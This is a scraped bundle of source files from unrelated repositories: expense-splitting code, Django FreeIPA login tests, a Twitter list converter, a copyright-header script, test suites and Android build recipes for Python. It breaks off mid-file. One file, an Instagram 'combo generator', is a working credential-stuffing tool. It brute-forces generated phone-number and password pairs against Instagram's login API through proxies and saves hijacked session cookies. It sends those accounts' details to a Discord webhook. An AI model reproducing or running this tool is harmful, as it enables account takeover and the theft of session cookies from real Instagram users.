:return: index in row/column in payment matrix for the incoming dude
"""
if dude.first_name == "Alex":
return 0
elif dude.first_name == "Daniel":
return 1
elif dude.first_name == "Patrick":
return 2
elif dude.first_name == "maany":
return 3
def payment_matrix(expenses):
"""
Generate a raw payment matrix
<NAME> maany patrick
___________________________
alex |
danny |
maany |
patrick |
:param expenses: group expenses from splitwise api
:return:
"""
matrix = [[0, 0, 0, 0], [0, 0, 0, 0], [0, 0, 0, 0], [0, 0, 0, 0]]
for expense in expenses:
paid_by = [ x for x in expense.users if float(x.net_balance) > 0]
owed_by = [ x for x in expense.users if float(x.net_balance) < 0]
if len(paid_by) > 1:
raise RuntimeError("Complex payment. Multiple people paid. Cannot process in the patrix right now")
if int(paid_by[0].id) in [int(user.id) for user in owed_by]:
print("Same person paid and owes?")
print("Expense: {expense}".format(expense=str(expense.description).encode('utf-8')))
print("Paid By: {paid_by}".format(paid_by=paid_by[0].first_name))
print("Amount: {amount}".format(amount=paid_by[0].net_balance))
print("Dudes who owe: {dude_who_owe}".format(dude_who_owe=[user.first_name for user in owed_by]))
for dude_who_owes in owed_by:
x = get_index_for_dude(paid_by[0])
y = get_index_for_dude(dude_who_owes)
amount = -1 * float(dude_who_owes.net_balance)
print("{dude} need to pay {amount}. Updating X: {x}, Y: {y}".format(dude=dude_who_owes.first_name,
amount =dude_who_owes.net_balance,
x = x,
y = y))
matrix[x][y] = amount
return matrix
def simplify_matrix(matrix):
"""
If A owes B and B owes A back, then only a single transaction can settle both up.
:param matrix: payment matrix
:return: simplified payment matrix
"""
i_j_pairs = [[i, j] for i in range(4) for j in range(4) if i < j]
for i_j_pair in i_j_pairs:
i = i_j_pair[0]
j = i_j_pair[1]
if matrix[i][j] > matrix[j][i]:
matrix[i][j] -= matrix[j][i]
matrix[j][i] = 0
else:
matrix[j][i] -= matrix[i][j]
matrix[i][j] = 0
return matrix
def print_matrix(matrix):
"""
Prints the 4x4 matrix
:param matrix:
:return:
"""
for row in matrix:
print("{e0}\t\t{e1}\t\t{e2}\t\t{e3}\n".format(e0=int(row[0]), e1=int(row[1]), e2=int(row[2]), e3=int(row[3])))
print("--------------------------------------------------------------------------------")
def triangle_simplifier(simplified_matrix):
"""
Implement Splitwise like polygon simplification on the matrix to reduce number of transactions needed to settle up.
:param simplified_matrix:
:return:
"""
pass
def alex_maany_analyzer(group, expenses):
alex = [x for x in group.members if x.first_name == "Alex"][0]
maany = [x for x in group.members if x.first_name == "maany"][0]
alex_maany_expenses = []
for expense in expenses:
user_id_array = [user.id for user in expense.users]
if alex.id in user_id_array and maany.id in user_id_array:
alex_maany_expenses.append(expense)
# some metrics
maany_net = sum([float(y.net_balance) for x in alex_maany_expenses for y in x.users if y.id == maany.id])
alex_net = sum([float(y.net_balance) for x in alex_maany_expenses for y in x.users if y.id == alex.id])
non_sfr = [x for x in alex_maany_expenses if x.description != 'SFR']
maany_to_pay = 0
maany_negative_transactions = []
maany_positive_transactions = []
wtf_transactions = []
# detailed shit
for expense in alex_maany_expenses:
###
# paid by alex and amount owed by maany = x
        # paid by maany and amount owed by alex = y
###
alex_expense_user = [user for user in expense.users if user.id == alex.id][0]
maany_expense_user = [user for user in expense.users if user.id == maany.id][0]
if float(alex_expense_user.net_balance) > 0 and float(maany_expense_user.net_balance) < 0:
maany_to_pay = maany_to_pay + float(maany_expense_user.net_balance)
maany_negative_transactions.append(expense)
elif float(alex_expense_user.net_balance) < 0 and float(maany_expense_user.net_balance) > 0:
maany_to_pay = maany_to_pay - float(alex_expense_user.net_balance)
maany_positive_transactions.append(expense)
else:
wtf_transactions.append(expense)
print("WTF WTF WTF WTF")
``` |
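The matrix helpers above need no Splitwise objects, so their behaviour can be checked with a toy payment matrix (a sketch; the `wallstreet` import reflects this file being the package `__init__.py`):
```python
from wallstreet import simplify_matrix, print_matrix

# matrix[i][j] = amount that person j owes person i (indices follow get_index_for_dude)
matrix = [
    [0, 10, 0, 0],
    [4,  0, 0, 0],
    [0,  0, 0, 7],
    [0,  0, 2, 0],
]

print_matrix(matrix)
simplified = simplify_matrix(matrix)
# The 10/4 and 7/2 pairs collapse into single 6 and 5 one-way debts.
print_matrix(simplified)
```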
{
"source": "88Ocelot/django-freeipa-auth",
"score": 2
} |
#### File: django-freeipa-auth/freeipa_auth/tests.py
```python
from django.test import Client
from django.conf import settings
from django.contrib.auth.models import User
import pytest
class TestFreeIpaBackendAuth(object):
client = Client()
username = "dummy_freeipa_username"
password = "<PASSWORD>"
def test_login(self, settings, patch_authenticate_success):
"""Test succesful login"""
logged_in = self.client.login(username=self.username, password=self.password)
assert logged_in
user = User.objects.get(username=self.username)
# No permissions on basic login
assert not user.is_staff
assert not user.is_superuser
def test_logout(self, patch_authenticate_success):
"""Test successful logout"""
logged_in = self.client.login(username=self.username, password=<PASSWORD>)
assert logged_in
logged_in = self.client.logout()
assert not logged_in
def test_update_user_groups(self, test_group, settings,
patch_authenticate_success, patch_remote_user_groups):
"""Test that user groups are update on first time login"""
settings.override(FREEIPA_AUTH_UPDATE_USER_GROUPS=True)
logged_in = self.client.login(username=self.username, password=<PASSWORD>)
assert logged_in
user = User.objects.get(username=self.username)
# Since the "is_staff" flag exists in the settings
# the user will be a staff member
assert user.is_staff
# No mapping was provided for the superuser
# flag so user will not be a superuser
assert not user.is_superuser
        # The user is part of "test_group" on the freeipa server, so the group
        # membership is reflected in django as well
assert test_group in user.groups.all()
def test_update_user_groups_with_prefix(self, test_group, monkeypatch, settings,
patch_authenticate_success, patch_remote_user_groups):
"""Test that user groups are mapped with a required group prefix"""
settings.override(FREEIPA_AUTH_UPDATE_USER_GROUPS=True)
# Patch user groups on freeipa to have the required prefix for mapping
monkeypatch.setattr("freeipa_auth.freeipa_utils.FreeIpaSession.groups",
["foo.django.group.admin",
"foo.django.group.test_group"])
logged_in = self.client.login(username=self.username, password=self.password)
assert logged_in
# Assert that the user in the mapped django
# groups and has the mapped permission
user = User.objects.get(username=self.username)
assert user.is_staff
assert test_group in user.groups.all()
def test_update_user_attrs(self, monkeypatch, settings,
patch_authenticate_success, patch_remote_user_groups):
"""Test that user attrs are updated on first time login"""
# Mock user data from freeipa
monkeypatch.setattr("freeipa_auth.freeipa_utils.FreeIpaSession._get_user_data",
lambda *args: {"givenname": ['Chester'], 'sn': ['Tester'], 'mail': ['<EMAIL>']})
logged_in = self.client.login(username=self.username, password=self.password)
assert logged_in
# Assert that user attrs are mapped and saved
user = User.objects.get(username=self.username)
assert user.first_name == "Chester"
assert user.last_name == "Tester"
assert user.email == '<EMAIL>'
def test_always_update_user(self, settings, monkeypatch,
patch_authenticate_success, patch_remote_user_groups):
"""Test that user is always updated on subsequent logins if set to True in settings"""
logged_in = self.client.login(username=self.username, password=self.password)
assert logged_in
user = User.objects.get(username=self.username)
# Assert that initially user is not a superuser
assert not user.is_superuser
logged_in = self.client.logout()
assert not logged_in
# Patch user groups on freeipa to have the superuser flag
monkeypatch.setattr("freeipa_auth.freeipa_utils.FreeIpaSession.groups",
["admin", "test_group", "superuser", "test_permission"])
# Login again
logged_in = self.client.login(username=self.username, password=<PASSWORD>)
assert logged_in
# User should now be superuser since
# FREEIPA_AUTH_ALWAYS_UPDATE_USER is set to True in settings
user = User.objects.get(username=self.username)
assert not user.is_superuser
assert user.is_staff
def test_no_update_user(self, settings, monkeypatch,
patch_authenticate_success, patch_remote_user_groups):
"""Test that user is not updated on subsequent logins if set to False in settings"""
settings.override(FREEIPA_AUTH_ALWAYS_UPDATE_USER=False,
FREEIPA_AUTH_USER_FLAGS_BY_GROUP={"is_staff": ["admin"],
'is_superuser': ['superuser']})
# Mock user data from freeipa
monkeypatch.setattr("freeipa_auth.freeipa_utils.FreeIpaSession._get_user_data",
lambda *args: {"givenname": ['Chester'], 'sn': ['Tester'], 'mail': ['<EMAIL>']})
logged_in = self.client.login(username=self.username, password=<PASSWORD>)
assert logged_in
user = User.objects.get(username=self.username)
# Assert that initially user does not have last name
assert not user.last_name
logged_in = self.client.logout()
assert not logged_in
# Patch user groups on freeipa to have the superuser flag
monkeypatch.setattr("freeipa_auth.freeipa_utils.FreeIpaSession.groups",
["admin", "test_group"])
# Login again
logged_in = self.client.login(username=self.username, password=self.password)
assert logged_in
        # User attributes should still not be updated (no last name) since FREEIPA_AUTH_ALWAYS_UPDATE_USER is set to False
user = User.objects.get(username=self.username)
assert not user.last_name
def test_invalid_credentials(self, patch_authenticate_fail):
"""Test that no django user is created when login credentials are invalid"""
logged_in = self.client.login(username=self.username, password=self.password)
assert not logged_in
# User should not be in the database
with pytest.raises(User.DoesNotExist):
User.objects.get(username=self.username)
def test_classic_django_auth(self, test_user):
"""Test that classic django auth is still the main authentication backend"""
# Here we can see we do not need to patch the freeipa response
# since it does not reach the freeipa backend auth when a
# user uses the django app login credentials
logged_in = self.client.login(username=test_user.username, password=<PASSWORD>.unhashed_password)
assert logged_in
@pytest.mark.skip(reason="Don't want to automate remote server calls")
def test_login_live(self, settings, liveserver_username, liveserver_password, liveserver):
"""Test succesful login on live server"""
settings.override(FREEIPA_AUTH_SERVER=liveserver,
FREEIPA_AUTH_SSL_VERIFY=False)
logged_in = self.client.login(username=liveserver_username, password=liveserver_password)
assert logged_in
assert User.objects.get(username=liveserver_username)
@pytest.mark.skip(reason="Don't want to automate remote server calls")
def test_login_live_failover(self, settings, liveserver_username, liveserver_password, liveserver):
"""
Test authentication falls back to failover
server if there is a connection error on main server
"""
settings.override(FREEIPA_AUTH_SERVER="test.fake-site.com",
FREEIPA_AUTH_FAILOVER_SERVER=liveserver,
FREEIPA_AUTH_SSL_VERIFY=False)
logged_in = self.client.login(username=liveserver_username, password=liveserver_password)
# Client will authenticate on failover
# server and be logged in on the django app
assert logged_in
assert User.objects.get(username=liveserver_username)
``` |
{
"source": "88RZ/discord-twitter-bot",
"score": 3
} |
#### File: bot/utils/twitter_id_converter.py
```python
from tweepy import API, Cursor
from tweepy.error import TweepError
import re
class Converter:
def __init__(self, config, auth):
self.config = config
self.client = API(auth)
def convert(self) -> dict:
for instance in self.config["Discord"]:
tmp_twitter_ids = []
if "twitter_lists" in instance.keys() and not instance["twitter_lists"] in [
None,
"",
[],
[""],
]:
for twitter_list in instance["twitter_lists"]:
tmp_twitter_ids += self.twitter_list_to_id(twitter_list)
if "twitter_handles" in instance.keys() and not instance["twitter_handles"] in [
None,
"",
[],
[""],
]:
tmp_twitter_ids += self.twitter_handle_to_id(instance["twitter_handles"])
if "twitter_ids" not in instance:
instance["twitter_ids"] = list()
instance["twitter_ids"].extend(
x for x in tmp_twitter_ids if x not in instance["twitter_ids"]
)
if "" in instance["twitter_ids"]:
instance["twitter_ids"].remove("")
if tmp_twitter_ids:
print(
"{amount} twitter ids have been added through twitter list.".format(
amount=len(tmp_twitter_ids)
)
)
# throw out config that don't have a webhook url
self.config["Discord"] = [
{k: v for k, v in instance.items() if instance.get("webhook_urls", [])}
for instance in self.config["Discord"]
]
# throw out config that have empty twitter_ids, track and location
self.config["Discord"] = [
{
k: v
for k, v in instance.items()
if instance.get("twitter_ids", [])
or instance.get("track", [])
or instance.get("location", [])
}
for instance in self.config["Discord"]
]
# throw out empty config
while {} in self.config["Discord"]:
self.config["Discord"].remove({})
return self.config
def twitter_list_to_id(self, twitter_list_url: str) -> list:
twitter_ids = []
pattern = "(https?:\/\/(?:www\.)?)?twitter\.com\/(i\/lists\/(?P<list_id>[a-zA-Z0-9-]+)|(?P<owner_screen_name>[a-zA-Z0-9]+)\/lists\/(?P<slug>[a-zA-Z0-9-]+))"
for m in re.finditer(pattern, twitter_list_url, re.I):
try:
for member in Cursor(
self.client.list_members,
list_id=m.group("list_id"),
owner_screen_name=m.group("owner_screen_name"),
slug=m.group("slug"),
).items():
twitter_id = member._json["id_str"]
if twitter_id not in twitter_ids:
twitter_ids.append(twitter_id)
except TweepError as e:
print(e)
return twitter_ids
def twitter_handle_to_id(self, twitter_handles: list) -> list:
full_users = []
user_count = len(twitter_handles)
for i in range(0, int((user_count // 100)) + 1):
try:
full_users.extend(
self.client.lookup_users(
screen_names=twitter_handles[i * 100 : min((i + 1) * 100, user_count)]
)
)
except TweepError as e:
print(e)
return [user.id_str for user in full_users]
if __name__ == "__main__":
import sys
sys.path.append("..")
from config import config, auth
c = Converter(config, auth)
print(c.convert())
``` |
{
"source": "88Sasha88/Chombo_3.2",
"score": 2
} |
#### File: util/migration/copyright.py
```python
import sys
import string
g_boilerplate = []
g_boilerplate.append(
"""\
// CHOMBO Copyright (c) 2000-2004, The Regents of the University of
// California, through Lawrence Berkeley National Laboratory (subject to
// receipt of any required approvals from U.S. Dept. of Energy). All
// rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are met:
//
// (1) Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
// (2) Redistributions in binary form must reproduce the above copyright
// notice, this list of conditions and the following disclaimer in the
// documentation and/or other materials provided with the distribution.
// (3) Neither the name of Lawrence Berkeley National Laboratory, U.S.
// Dept. of Energy nor the names of its contributors may be used to endorse
// or promote products derived from this software without specific prior
// written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
// TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
// PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER
// OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
// EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
// PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
// PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
// LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
// NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
// SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
//
// You are under no obligation whatsoever to provide any bug fixes,
// patches, or upgrades to the features, functionality or performance of
// the source code ("Enhancements") to anyone; however, if you choose to
// make your Enhancements available either publicly, or directly to
// Lawrence Berkeley National Laboratory, without imposing a separate
// written license agreement for such Enhancements, then you hereby grant
// the following license: a non-exclusive, royalty-free perpetual license
// to install, use, modify, prepare derivative works, incorporate into
// other computer software, distribute, and sublicense such Enhancements or
// derivative works thereof, in binary and source code form.
//
// TRADEMARKS. Product and company names mentioned herein may be the
// trademarks of their respective owners. Any rights not expressly granted
// herein are reserved.
//\
""".split('\n'))
g_boilerplate.append( g_boilerplate[-1][:] )
g_boilerplate[-1][0] = string.replace( g_boilerplate[-1][0], '2004', '2006' )
g_boilerplate.append(
"""\
// This software is copyright (C) by the Lawrence Berkeley
// National Laboratory. Permission is granted to reproduce
// this software for non-commercial purposes provided that
// this notice is left intact.
//
// It is acknowledged that the U.S. Government has rights to
// this software under Contract DE-AC03-765F00098 between
// the U.S. Department of Energy and the University of
// California.
//
// This software is provided as a professional and academic
// contribution for joint exchange. Thus it is experimental,
// is provided ``as is'', with no warranties of any kind
// whatsoever, no support, no promise of updates, or printed
// documentation. By using this software, you acknowledge
// that the Lawrence Berkeley National Laboratory and
// Regents of the University of California shall have no
// liability with respect to the infringement of other
// copyrights by any part of this software.
//\
""".split('\n'))
g_boilerplate.append(
"""\
C CHOMBO Copyright (c) 2000-2004, The Regents of the University of
C California, through Lawrence Berkeley National Laboratory (subject to
C receipt of any required approvals from U.S. Dept. of Energy). All
C rights reserved.
C
C Redistribution and use in source and binary forms, with or without
C modification, are permitted provided that the following conditions are met:
C
C (1) Redistributions of source code must retain the above copyright
C notice, this list of conditions and the following disclaimer.
C (2) Redistributions in binary form must reproduce the above copyright
C notice, this list of conditions and the following disclaimer in the
C documentation and/or other materials provided with the distribution.
C (3) Neither the name of Lawrence Berkeley National Laboratory, U.S.
C Dept. of Energy nor the names of its contributors may be used to endorse
C or promote products derived from this software without specific prior
C written permission.
C
C THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
C "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
C TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
C PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER
C OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
C EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
C PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
C PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
C LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
C NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
C SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
C
C You are under no obligation whatsoever to provide any bug fixes,
C patches, or upgrades to the features, functionality or performance of
C the source code ("Enhancements") to anyone; however, if you choose to
C make your Enhancements available either publicly, or directly to
C Lawrence Berkeley National Laboratory, without imposing a separate
C written license agreement for such Enhancements, then you hereby grant
C the following license: a non-exclusive, royalty-free perpetual license
C to install, use, modify, prepare derivative works, incorporate into
C other computer software, distribute, and sublicense such Enhancements or
C derivative works thereof, in binary and source code form.
C
C TRADEMARKS. Product and company names mentioned herein may be the
C trademarks of their respective owners. Any rights not expressly granted
C herein are reserved.
C\
""".split('\n'))
g_boilerplate.append(
"""\
C This software is copyright (C) by the Lawrence Berkeley
C National Laboratory. Permission is granted to reproduce
C this software for non-commercial purposes provided that
C this notice is left intact.
C
C It is acknowledged that the U.S. Government has rights to
C this software under Contract DE-AC03-765F00098 between
C the U.S. Department of Energy and the University of
C California.
C
C This software is provided as a professional and academic
C contribution for joint exchange. Thus it is experimental,
C is provided ``as is'', with no warranties of any kind
C whatsoever, no support, no promise of updates, or printed
C documentation. By using this software, you acknowledge
C that the Lawrence Berkeley National Laboratory and
C Regents of the University of California shall have no
C liability with respect to the infringement of other
C copyrights by any part of this software.
C\
""".split('\n'))
def logo( filename ):
chombo = [
'#ifdef CH_LANG_CC',
'/*',
'* _______ __',
'* / ___/ / ___ __ _ / / ___',
'* / /__/ _ \\/ _ \\/ V \\/ _ \\/ _ \\',
'* \\___/_//_/\\___/_/_/_/_.__/\\___/',
"* Please refer to Copyright.txt, in Chombo's root directory.",
'*/',
'#endif']
result = ''
if filename[-4:] == '.ChF':
for i in (8,7,1,0):
del chombo[i]
for line in chombo:
if filename[-4:] == '.ChF':
line = string.replace(line,'*','C')
result += line + '\n'
return result
"""
Close-enough match between line in source file, and line we're looking for.
"""
def goodmatch( str1, str2 ):
gstr1 = str1[1:].strip() # Ignores ^C vs ^!, and number blank spaces after C
gstr2 = str2[1:].strip() # Ignores ^C vs ^!, and number blank spaces after C
return gstr1 == gstr2
def stripBoilerplate( filename ):
result = []
boilerplate_line=0
overall_line=-1
bp_model = None # element of g_boilerplate -- the one found
#
# Insert pointer to copyright notice.
#
result.append( logo(filename) )
#
# Find which line copyright notice ends at, and copy file from that point
# on. If you can't find anything like a copyright notice, then copy the
# entire file.
#
last_line_of_copyright = 0
include_guards = []
text = open(filename).readlines()
for line in text:
overall_line += 1
# Don't lose the include guards, if they're at very top of file:
if( (overall_line < 3)
and ( (-1 != line.find('#ifndef'))
or (-1 != line.find('#define')))):
include_guards.append( line )
if not bp_model:
for bp in g_boilerplate:
if goodmatch( line[:-1], bp[0] ):
bp_model = bp
last_line_of_copyright = overall_line + len(bp_model)
break
if overall_line == 20:
print "Warning:(", filename, ") haven't found boilerplate yet."
break
# Go through once again, this time copying everything from the end of the
# copyright notice.
overall_line = -1
if (last_line_of_copyright != 0) and (len(include_guards)==2):
result += include_guards
if -1 != text[last_line_of_copyright].find( '#endif' ): # matches CH_LANG_CC
text[last_line_of_copyright] = '\n' # we removed.
for iline in range(last_line_of_copyright, len(text)):
result += text[iline]
outfile = open( filename + '.new', 'w' )
for rl in result:
outfile.write(rl)
if __name__ == '__main__':
stripBoilerplate( sys.argv[1] )
``` |
{
"source": "88um/instagram-combo-gen",
"score": 3
} |
#### File: 88um/instagram-combo-gen/main.py
```python
import requests, random, os, uuid, time
class Hack:
def __init__(self):
self.done = 0
self.error = 0
self.secure = 0
self.block = 0
self.webhook = ''#INSERT DISCORD WEBHOOK HERE
self.url = 'https://b.i.instagram.com/api/v1/accounts/login/'
self.headers = {'User-Agent': 'Instagram 172.16.58.3.122 Android (24/5.0; 515dpi; 1440x2416; huawei/google; Nexus 6P; angler; angler; en_US)'}
self.uid = str(uuid.uuid4())
self.banner = """
)\ ( ) ( /( ( (
(((_) )( ( /( ( )\()) ))\ )(
)\___(()\ )(_)) )\((_)\ /((_|()\
((/ __|((_|(_)_ ((_) |(_|_)) ((_)
| (__| '_/ _` / _|| / // -_)| '_|
\___|_| \__,_\__||_\_\\___||_|
by @crackled on tele"""
def clear(self):
os.system('cls' if os.name == 'nt' else 'clear')
print( '……………………………………………………………………………………………………………………………………………………')
print(self.banner)
print( '……………………………………………………………………………………………………………………………………………………')
print(( f"\r \n [=] Hit : {self.done} \n [=] Fail : {self.error} \n [=] Secure : {self.secure}\n [=] Blocked : {self.block}\n [=] User : {self.username} \n [=] Pass : {self.password} "), end='')
def generate(self, proxy):
self.proxy = proxy
users = '0987654321'
us = str(''.join((random.choice(users) for i in range(7))))
self.username = '+98935' + us
self.password = '<PASSWORD>' + us
self.login()
def login(self):
r = requests.session()
if self.proxy:
file = open('proxies.txt').read().splitlines()
prox = random.choice(file)
proxies = {'http': 'http://' + prox, 'https': 'http://' + prox}
r.proxies.update(proxies)
data = {'uuid':self.uid, 'password':<PASSWORD>, 'username':self.username, 'device_id':self.uid, 'from_reg':'false', '_csrftoken':'missing', 'login_attempt_countn':'0'}
send = r.post(self.url,headers=self.headers,data=data)
text = send.text
if 'logged_in_user' in text:
self.done+=1
Json = send.json()
id = send.cookies['sessionid']
with open('hit.txt','a') as f:
f.write(f'{self.username}:{self.password}:{id}\n')
with open('sessions.txt','a') as f:
f.write(f'{id}\n')
user = Json['logged_in_user']['username']
self.disc(id,user)
elif "challenge_required" in text:
with open('secure.txt','a') as f:
f.write(f'{self.username}:{self.password}')
self.secure+=1
elif send.status_code == 429:
self.block+=1
else:
self.error+=1
self.clear()
def disc(self,id, username):
head = {'HOST':'www.instagram.com', 'KeepAlive':'True', 'user-agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36', 'Cookie':f'sessionid={id}', 'Accept':'*/*', 'ContentType':'application/x-www-form-urlencoded', 'X-Requested-With':'XMLHttpRequest', 'X-IG-App-ID':'936619743392459', 'X-Instagram-AJAX':'missing', 'X-CSRFToken':'missing', 'Accept-Language':'en-US,en;q=0.9'}
url_id = f"https://www.instagram.com/{username}/?__a=1"
try:
req_id = requests.get(url_id, headers=head).json()
name = str(req_id['graphql']['user']['full_name'])
idd = str(req_id['graphql']['user']['id'])
followes = str(req_id['graphql']['user']['edge_followed_by']['count'])
following = str(req_id['graphql']['user']['edge_follow']['count'])
re = requests.get(f"https://o7aa.pythonanywhere.com/?id={idd}")
ree = re.json()
dat = ree['data']
webh = {"content":f" New Hit Nigga: @{username}!","embeds":[{"title":f"Successfully Cracked {username}!","description":f"Status: SUCCESS\n-\nUser ID: {idd}\n-\nName: {name}\n-\nFollowers: {followes}\n-\nFollowing: {following}\n-\nAge: {dat}\n","url":f"https://instagram.com/{username}","color":14177041}],"username":"Cracker Bot.","avatar_url":"https://www.pandasecurity.com/en/mediacenter/src/uploads/2019/07/pandasecurity-How-do-hackers-pick-their-targets.jpg"}
requests.post(self.webhook,json=webh)
return True
except:
return False
if __name__ == '__main__':
ig = Hack()
print(ig.banner + '\n')
choice = input('[+] Use Proxies? (Y/N): ')
if choice == 'y' or choice == 'Y':proxy=True;print('\n [!] Proxies Activated! ');time.sleep(3)
else:proxy=False;print('\n [!] Running without proxies! ');time.sleep(3)
while True:
ig.generate(proxy)
``` |
{
"source": "8916/CloudFunction",
"score": 2
} |
#### File: python/samples/req.py
```python
def onRequest(request, response, modules):
response.send({
"urlParams": request.getQueryParams(),
"bodyParams": request.getParams(),
"headers": request.getHeaders(),
"method": request.getMethod(),
"path": request.getPath()
})
``` |
{
"source": "89258085058/software_testing",
"score": 3
} |
#### File: software_testing/test/test_add_and_dell_contact_to_group.py
```python
from fixture.orm import *
import random
def test_add_contact_to_group(app, orm):
contact = None
add_to_group = None
all_groups = orm.get_group_list()
if len(all_groups) == 0:
app.group.add_personal_information(Contact(firstname="Alexandr", lastname="Gorelov"))
all_groups = orm.get_group_list()
for group in all_groups:
contacts = orm.get_contacts_not_in_group(group)
if len(contacts) > 0:
contact = contacts[0]
add_to_group = group
break
if contact is None:
app.contact.add_personal_information(Contact(firstname="test", lastname="test"))
contacts = sorted(orm.get_contact_list(), key=Contact.id_or_max)
contact = contacts[len(contacts)-1]
old_contacts = orm.get_contacts_in_group(add_to_group)
app.contact.add_contact_to_group(contact, add_to_group)
new_contacts = orm.get_contacts_in_group(add_to_group)
assert len(old_contacts) + 1 == len(new_contacts) and new_contacts.count(contact) == 1
def test_del_random_contact_to_random_group(app, orm):
contact = None
add_to_group = None
all_groups = orm.get_group_list()
if len(all_groups) == 0:
app.group.add_personal_information(Contact(firstname="Alexandr1", lastname="Gorelov1"))
app.contact.add_contact_to_group(random.choice(orm.get_contact_list()), random.choice(orm.get_group_list()))
all_groups = orm.get_group_list()
for group in all_groups:
contacts = orm.get_contacts_in_group(group)
if len(contacts) > 0:
contact = contacts[0]
add_to_group = group
break
if contact is None and orm.get_contact_list() == 0:
app.contact.add_personal_information(Contact(firstname="test1", lastname="test1"))
contact = orm.get_contact_list()[0]
add_to_group = random.choice(orm.get_group_list())
app.contact.add_contact_to_group(contact, add_to_group)
elif contact is None and orm.get_contact_list() != 0:
contact = random.choice(orm.get_contact_list())
add_to_group = random.choice(orm.get_group_list())
app.contact.add_contact_to_group(contact, add_to_group)
old_contacts = orm.get_contacts_in_group(add_to_group)
app.contact.del_contact_to_group(contact, add_to_group)
new_contacts = orm.get_contacts_in_group(add_to_group)
assert len(old_contacts) - 1 == len(new_contacts) and new_contacts.count(contact) == 0
```
#### File: software_testing/test/test_del_contact.py
```python
import random
from model.contact import Contact
import allure
def test_delete_some_contact(app, db, check_ui):
if len(db.get_contact_list()) == 0:
app.contact.add_personal_information(Contact(firstname="", lastname="", homephone="", mobilephone="",
workphone="", secondaryphone="", Address="", email="", email2="", email3=""))
with allure.step('Given a non-empty contact list'):
old_cantacts = db.get_contact_list()
with allure.step('Given a random contact from the list'):
contact = random.choice(old_cantacts)
with allure.step('When I delete the contact from the list'):
app.contact.del_contact_by_id(contact.id)
with allure.step('Then the new contact list is equal to the old list without deleted contact'):
new_contacts = db.get_contact_list()
old_cantacts.remove(contact)
if check_ui:
assert sorted(new_contacts, key=Contact.id_or_max) == sorted(app.contact.get_contact_list(), key=Contact.id_or_max)
``` |
{
"source": "892768447/python3-android",
"score": 2
} |
#### File: pybuild/packages/bzip2.py
```python
from ..ndk import ndk
from ..source import GitSource
from ..package import BasePackage
from ..util import android_api_level, target_arch
class BZip2Source(GitSource):
def __init__(self):
super().__init__('https://gitlab.com/federicomenaquintero/bzip2')
def get_version(self):
if not self._version and self.source_dir.exists():
rev_count = self.run_in_source_dir([
'git', 'rev-list', '--count', 'HEAD'
], mode='result').strip()
rev = self.run_in_source_dir([
'git', 'rev-parse', '--short', 'HEAD'
], mode='result').strip()
self._version = f'r{rev_count}.{rev}'
return self._version
class BZip2(BasePackage):
source = BZip2Source()
def prepare(self):
self.run_with_env([
'cmake',
f'-DCMAKE_TOOLCHAIN_FILE={ndk.cmake_toolchain}',
f'-DANDROID_ABI={target_arch().CMAKE_ANDROID_ABI}',
f'-DANDROID_PLATFORM=android-{android_api_level()}',
'-DENABLE_STATIC_LIB=ON',
'-DENABLE_SHARED_LIB=OFF',
'-DCMAKE_INSTALL_PREFIX=/usr',
'.'
])
def build(self):
self.run_with_env(['make'])
self.run_with_env(['make', 'install', f'DESTDIR={self.destdir()}'])
```
#### File: pybuild/packages/ncurses.py
```python
import re
from ..source import GitSource
from ..package import Package
from ..util import target_arch
class NCursesSource(GitSource):
def __init__(self):
super().__init__('https://github.com/ThomasDickey/ncurses-snapshots')
def get_version(self):
v = super().get_version()
if v:
return re.sub(r'v(\d+)_(\d+)_(\d+)', r'\1.\2-\3', v)
class NCurses(Package):
source = NCursesSource()
def prepare(self):
self.run_with_env([
'./configure',
'--prefix=/usr',
f'--host={target_arch().ANDROID_TARGET}',
'--without-ada',
'--enable-widec',
'--without-shared',
'--with-normal',
'--without-debug',
'--without-cxx-binding',
'--enable-warnings',
'--disable-stripping',
])
def build(self):
self.run(['make'])
self.run(['make', 'install', f'DESTDIR={self.destdir()}'])
```
#### File: pybuild/packages/python.py
```python
from .. import env
from ..source import GitSource
from ..package import Package
from ..patch import LocalPatch
from ..util import target_arch
class PythonSource(GitSource):
def __init__(self):
super().__init__('https://github.com/python/cpython/')
def get_version(self):
if not self._version and self.source_dir.exists():
rev_count = self.run_in_source_dir([
'git', 'rev-list', '--count', 'HEAD'
], mode='result').strip()
rev = self.run_in_source_dir([
